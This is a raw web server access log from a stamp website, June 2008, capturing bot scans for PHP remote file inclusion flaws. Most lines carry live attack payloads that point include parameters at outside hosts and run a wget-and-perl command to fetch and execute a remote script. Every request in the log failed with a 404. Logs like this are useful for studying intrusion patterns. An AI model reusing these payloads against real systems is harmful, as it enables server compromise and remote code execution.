195.146.242.105 - - [15/Jun/2008:18:02:21 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
88.198.185.6 - - [15/Jun/2008:18:02:22 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.246.129.122 - - [15/Jun/2008:18:02:27 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
213.208.134.30 - - [15/Jun/2008:18:02:33 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
81.16.50.217 - - [15/Jun/2008:18:03:45 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:03:55 -0700] "GET /logs/access_080602.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:03:57 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.111.170.125 - - [15/Jun/2008:18:04:03 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:18:04:40 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:18:05:09 -0700] "GET /logs/access_080602.log/main.php?x=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:05:21 -0700] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:05:24 -0700] "GET /logs/access_080602.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:05:24 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
62.140.19.133 - - [15/Jun/2008:18:06:00 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
62.140.19.101 - - [15/Jun/2008:18:06:00 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
213.68.134.3 - - [15/Jun/2008:18:06:15 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
12.29.165.84 - - [15/Jun/2008:18:06:45 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:08:34 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:08:41 -0700] "GET //appserv/main.php?appserv_root=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.105.208.186 - - [15/Jun/2008:18:10:02 -0700] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.gspdesigns.com/gspmx/plugins/p17_image_gallery/images/helpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.46.13.250 - - [15/Jun/2008:18:10:08 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:18:10:18 -0700] "GET /logs/access_080407.log/index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:18:10:19 -0700] "GET /index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:18:10:19 -0700] "GET /logs/index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.106.61.18 - - [15/Jun/2008:18:13:37 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.61.18 - - [15/Jun/2008:18:13:37 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.6.169 - - [15/Jun/2008:18:14:30 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.6.169 - - [15/Jun/2008:18:14:31 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.28.69.222 - - [15/Jun/2008:18:14:32 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.28.69.222 - - [15/Jun/2008:18:14:32 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:14:33 -0700] "GET /logs/access_080526.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:14:33 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:18:14:33 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.236.53.164 - - [15/Jun/2008:18:15:06 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.236.53.164 - - [15/Jun/2008:18:15:07 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.246.129.122 - - [15/Jun/2008:18:15:28 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.246.129.122 - - [15/Jun/2008:18:15:28 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
87.230.27.160 - - [15/Jun/2008:18:15:53 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.230.27.160 - - [15/Jun/2008:18:15:54 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
213.208.134.30 - - [15/Jun/2008:18:15:58 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
213.208.134.30 - - [15/Jun/2008:18:15:58 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.198.185.6 - - [15/Jun/2008:18:16:02 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.198.185.6 - - [15/Jun/2008:18:16:02 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
81.75.227.51 - - [15/Jun/2008:18:16:07 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
91.197.136.30 - - [15/Jun/2008:18:16:07 -0700] "GET /index2.php?pag=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
202.5.95.201 - - [15/Jun/2008:18:17:39 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:18:18:06 -0700] "GET /logs/access_071210.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:18:18:19 -0700] "GET /logs/access_080526.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:18:18:20 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:18:18:20 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
203.30.161.227 - - [15/Jun/2008:18:18:21 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.mathstamps.com"
89.111.170.125 - - [15/Jun/2008:18:18:54 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.111.170.125 - - [15/Jun/2008:18:18:55 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
12.29.165.84 - - [15/Jun/2008:18:19:45 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
12.29.165.84 - - [15/Jun/2008:18:19:45 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.28.69.222 - - [15/Jun/2008:18:21:08 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.6.169 - - [15/Jun/2008:18:21:12 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.61.18 - - [15/Jun/2008:18:21:23 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
89.108.80.142 - - [15/Jun/2008:18:22:40 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
85.236.53.164 - - [15/Jun/2008:18:23:05 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:18:23:13 -0700] "GET /logs/access_080526.log/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:18:23:15 -0700] "GET /main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:18:23:16 -0700] "GET /logs/main.php?x=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.85.13 - - [15/Jun/2008:18:23:28 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
66.246.129.122 - - [15/Jun/2008:18:24:00 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
213.208.134.30 - - [15/Jun/2008:18:24:11 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
88.198.185.6 - - [15/Jun/2008:18:25:08 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.230.27.160 - - [15/Jun/2008:18:25:09 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
12.29.165.84 - - [15/Jun/2008:18:27:03 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
125.245.146.189 - - [15/Jun/2008:18:27:14 -0700] "GET /view.inc.php?phpAds_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
89.111.170.125 - - [15/Jun/2008:18:27:36 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.195.54.37 - - [15/Jun/2008:18:28:00 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
85.214.28.45 - - [15/Jun/2008:18:28:01 -0700] "GET /logs/access_080505.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
85.214.28.45 - - [15/Jun/2008:18:28:01 -0700] "GET /include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
85.214.28.45 - - [15/Jun/2008:18:28:02 -0700] "GET /logs/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:18:29:40 -0700] "GET /logs/access_080602.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:18:29:40 -0700] "GET /logs/access_080602.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:18:29:40 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:18:29:40 -0700] "GET //index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:18:29:40 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.68.79 - - [15/Jun/2008:18:29:41 -0700] "GET /logs//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.wowturks.com/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.46.13.250 - - [15/Jun/2008:18:30:13 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
